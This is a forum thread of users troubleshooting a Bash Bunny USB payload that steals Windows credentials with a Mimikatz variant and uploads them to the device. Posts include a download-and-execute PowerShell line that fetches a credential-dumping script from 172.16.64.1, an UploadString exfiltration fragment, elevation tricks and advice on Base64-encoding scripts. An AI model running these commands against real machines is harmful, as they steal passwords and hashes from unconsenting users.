Jump to content
illwill

Violation of CoC

Recommended Posts

When I run it, it's stalling out at the " WebServer started and Uploading Results" stage.  Initially I thought it might be because I run as a full-time vpn client, and that was messing up the routes.  But, I disabled the VPN, and it's still stalling out.  I'll try to step through the attack manually, and see where it's breaking down.

  • Upvote 1

Share this post


Link to post
Share on other sites

This is wicked man :ph34r:

Edited by oXis

Share this post


Link to post
Share on other sites

This is awesome, Just tested on my Windows 7 Virtual Machine and it snagged the plaintext password in about 15 seconds. Great job!

Share this post


Link to post
Share on other sites

So far this just wiped everything in the loot folder. 

 

Tested on Windows 10. 

Going to do some more tests. 

 

Getting this, might be the problem: 

C:\WINDOWS\system32>powershell -c \"while \(\$true\) \{ If \(Test-Connection 172.16.64.1 -count 1 -quiet\) \{ sleep 2\; exit\"\}\}
At line:1 char:91
+ ... (Test-Connection 172.16.64.1 -count 1 -quiet\) \{ sleep 2\; exit"\}\}
+                                                                      ~
Unexpected token '\' in expression or statement.
At line:1 char:92
+ ... (Test-Connection 172.16.64.1 -count 1 -quiet\) \{ sleep 2\; exit"\}\}
+                                                                       ~
Unexpected token '}' in expression or statement.
At line:1 char:94
+ ... (Test-Connection 172.16.64.1 -count 1 -quiet\) \{ sleep 2\; exit"\}\}
+                                                                         ~
Unexpected token '}' in expression or statement.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : UnexpectedToken
 

Edited by azzarin

Share this post


Link to post
Share on other sites

So when I try to run this on a laptop with certain policies in the place, the CMD command asks for credentials to load when then causes the whole script to fail after that point as command prompt does not get executed.  SO I think that bypassing UAC in this method is not working, in my situation.

Edited by korang

Share this post


Link to post
Share on other sites
17 hours ago, illwill said:

you cant copy the code directly and paste it into a cmd prompt because theres backslashes that are escaping special characters....

I just made it pause for longer. I did not copy it. i ll try again. Have you tried on Windows 10 ?

It might have to do with the language. When it types the line in "cmd" i can see special charecter. and it looks the same as i posted before.

Tried on 2 PCs with Windows 10.

 

And thanks for making this.

Edited by azzarin

Share this post


Link to post
Share on other sites

I was reading through the script and noticed in some instances what korang says happens.  I found out in my travels with the Rubber Ducky not all windows have GUI r set to open run.  Only particular machine (SHIFT-CTRL-ENTER) does not run something as admin.  Have not looked into why.

I just got the BB last week, seen this script and see some improvements that can be made.  My first project to get acclimated with the BB is to do a rewrite of this in a way that will work on all WIndows 7 and up boxes.  This is not anyway a diss of what is currently there.  I just have ideas to improve it more.  Also, want to do wat BunnyTap does and use a Node server instead of Python.  I love Python, I use it alot.  Just trying other things.

"Discovery is done through experimentation"..Dr. Whitehall (Marvel)

 

Secret I use for admin is instead of using cmd by itself, I use powershell to run it and get the same prompting result as the CTRL-SHIFT-ENTER would do.

powershell -c "Start-Process cmd -verb runas"

Now i don't have to worry about those shortcut keys not working.

 

Also for the yes command after the prompt an ALT-Y works best for selecting it.

Also also found myself building my own agents to fire off a UAC bypass script that will launch my actual script.  I did this a few times for fun but takes up another 5-10 seconds at the terminal to complete so not practical in a time crunch.

 

Lastly, I see a lot of clear text scripts in Powershell.  I always reduce and then encode my Powershell scripts.  Help to avoid having to escape character stuff since Base64 is universal.  I am going to post some of my tricks from Powershell Empire, Powersploit and Rubber Ducky experiences with Powershell that can be translated to the BB here shortly today.

Share this post


Link to post
Share on other sites
57 minutes ago, PoSHMagiC0de said:

I was reading through the script and noticed in some instances what korang says happens.  I found out in my travels with the Rubber Ducky not all windows have GUI r set to open run.  Only particular machine (SHIFT-CTRL-ENTER) does not run something as admin.  Have not looked into why.

I just got the BB last week, seen this script and see some improvements that can be made.  My first project to get acclimated with the BB is to do a rewrite of this in a way that will work on all WIndows 7 and up boxes.  This is not anyway a diss of what is currently there.  I just have ideas to improve it more.  Also, want to do wat BunnyTap does and use a Node server instead of Python.  I love Python, I use it alot.  Just trying other things.

"Discovery is done through experimentation"..Dr. Whitehall (Marvel)

 

Secret I use for admin is instead of using cmd by itself, I use powershell to run it and get the same prompting result as the CTRL-SHIFT-ENTER would do.


powershell -c "Start-Process cmd -verb runas"

Now i don't have to worry about those shortcut keys not working.

 

Also for the yes command after the prompt an ALT-Y works best for selecting it.

Also also found myself building my own agents to fire off a UAC bypass script that will launch my actual script.  I did this a few times for fun but takes up another 5-10 seconds at the terminal to complete so not practical in a time crunch.

 

Lastly, I see a lot of clear text scripts in Powershell.  I always reduce and then encode my Powershell scripts.  Help to avoid having to escape character stuff since Base64 is universal.  I am going to post some of my tricks from Powershell Empire, Powersploit and Rubber Ducky experiences with Powershell that can be translated to the BB here shortly today.

Looking forward to see what you bring to the table.

Share this post


Link to post
Share on other sites
1 hour ago, azzarin said:

I just made it pause for longer. I did not copy it. i ll try again. Have you tried on Windows 10 ?

It might have to do with the language. When it types the line in "cmd" i can see special charecter. and it looks the same as i posted before.

Tried on 2 PCs with Windows 10.

 

And thanks for making this.

Changed to English keyboard, it helped a bit, but does not connect back to the bashbunny. Fails to connect. 

Share this post


Link to post
Share on other sites

First off all, Thanks for the great payload,

Secondly, unfortenately at first it didn't work, So after putting a pause in the payload I could see why it didn't work.

The powershell command  creates a typo (i quess it has to do with the keyboard layout),look at  the end where the name of the file creates ÉOF instead of 'EOF'

  •  part of the output: ew-Object Net.WebClient).UploadString('http://172.16.64.1/EOF',ÉOF');

So I solved the problem by changing all the file names EOF into DOF.   That way the payload creates a file 'DOF' and works create.

Also change the name In the file server.py ( EOF in DOF), change it in whatever you like but avoid the letter E and A sinds É also exists

I would suggest to change it in the original payload? Since more people use a US keyboardlayout.

Anyway Thanks for the payload and keep up the good work!

 

Share this post


Link to post
Share on other sites

Good Work, 

I had the same idea because I'm pentesting a company who had forbidden USB Storage and Internet  access per Policy. They have a good firewall with contenfilter and only a few Internet pages will be allowed. So you saved me a lot of time coding the stuff... :cool: :rolleyes: Thank you ....

One idea...

.... the whole QUACK stuff takes a lot of time. To save attack time put a lot of the QUACK code into the powershellcode.  I had done it with your CredDump Payload.

 https://github.com/qdba/bashbunny-payloads/tree/master/payloads/DumpCreds

 

Only a suggestion. You do a really good work anyway. 

 

 

Share this post


Link to post
Share on other sites

Hey, when blinking white, does the bb need to have a shared connection with the victim?

Also, it says it succeeded but there is nothing in the loot folder. 

Edited by hkyq

Share this post


Link to post
Share on other sites

Anyone having luck with this payload? have 1.1 working and i'm having same problems as others. Payload executes but only creates an empty loot folder with nothing in it.

Share this post


Link to post
Share on other sites

I haven't testing IWill's payload since he built it.  I just seen he built it and looked cool from a code point of view.  I know he had timing issues in the beginning.  Best way is to test.  To test, in his payload.txt, edit it and remove the hidden parameter.  This will make everything it does visible.  See if any red errors go flying across the screen.

You can edit the first line of ps1 also, for testing only, to see if mimi is even running and sending output.  At the bottom will be the example of using tee-object to put output in a variable and display it to console so you see the output on the windows machine and still capture it in the "o" variable.

I have not gave his payload a go yet directly to see the interaction.  I like his python server and the kill command he sends at the end to close it out rather than leave it running in the background all day.

IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/md.ps1');Invoke-Mimidogz -DumpCred | tee-object -Variable o

 

Share this post


Link to post
Share on other sites

Info on this module and similar ones.

If you are trying to run Mimi-whatever on a fully updated Windows 10 machine or even powerdump, good luck.  It has been hardened against these.  Avast is even able to sniff execution in Win 10  so it will detect mimikatz but not dogz but dogz will get nothing still.  Powerdump will throw an illegal ptr operation.  Exploitation frameworks are having the same issue.  Windows 7 seems to not have this issue.

 

Avast will detect the exploitation framework too, freeze the operation of it coming up and inform the user of something funny going on and if they want to ignore or kill the process.  The challenge is now on.

So, on Windows 10 MS is making it tougher to steal creds in memory.  Windows 7 shouldn't have no concern.  Of course Win 10 people have to worry about MS spying on them with the Creator Update.

  • Upvote 1

Share this post


Link to post
Share on other sites

This is one of the best payloads. Even if you can't snag the plain text (windows 10) you still get the password hashes. If you can't get it working. just add a few more DELAYs.

As, I'm in China, I have to add Q SHIFT once it opens the terminal. This is because many systems use a pinyin input method that switches back and forth from English to Chinese by pressing SHIFT. If I don't, the terminal will fill up with Chinese characters.

Great payload dude!

Share this post


Link to post
Share on other sites

On my updated WIn10 Pro machine and image it fails.  The injects that some payloads need to do are not allowed anymore, even with PS2.0 enabled.  Update the Win10 machine to the latest updates and you may see the same.  If it is Win10 Home, I then do not know how it will work.

 

I noticed any exploit framework I have the process injects are failing now on Win10.

 

Share this post


Link to post
Share on other sites

I tried to mess around with mimikatz on win 10 and it denied me every time no matter what directory I used or even as an admin.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...